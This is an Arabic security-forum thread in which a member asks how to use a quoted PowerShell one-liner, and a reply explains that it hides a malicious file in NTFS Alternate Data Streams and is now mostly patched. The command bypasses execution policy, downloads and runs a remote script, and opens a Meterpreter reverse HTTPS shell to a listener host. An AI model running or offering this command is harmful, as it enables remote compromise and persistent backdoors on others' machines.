كيف استفيد من هذا الكود


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

أبو خليل

مشارك
29 أكتوبر 2018
75
93
0
  • أعجبني
التفاعلات: mqo-zz

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,351
2,455
1
القسم مخالف اخي الحبيب استفسارك برمجي لازم تحط موضوعك بقسم استفسارات البرمجه مش بقسم شروحات الحمايه ^_^
 

Mariio

مراقب عام
30 يناير 2019
20
63
0
powershell.exe -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.138/Invoke-ADSBackdoor.ps1’); Invoke-ADSBackdoor -URL http://192.168.1.138/Invoke-Shellcode.ps1 -Arguments ‘Invoke-Shellcode -LHost 192.168.1.138 -LPort 666 -Payload windows/meterpreter/reverse_https -Force’



مصدر الكود https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/

اهلا اخي
هذه ليست اكواد وانما طريقه لتخفي الملف الخبيث
بلحقيقه الطريقه لن تنفع لان الترقيعات من ويندوز اغلقت هذه الاشياء
كان سابقا ممكن تخفي ملف خبيث داخل ملف سليم بدون الكشف ويوضع الملف الخبيث داخل ADS وبهذا الويندوز سوف يشغل الملفين بدون معرفه الثاني
عموما الطريقه معقده اكثر الان وتحتاج الكثير من الصلاحيات وحاقن نظيف وتشغيل اوامر بورشيل مثل ما موضح بلموضوع لكن كلشيء يحتاج صلاحيات مثل ماقلت
 
  • أعجبني
التفاعلات: أبو خليل و panda

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك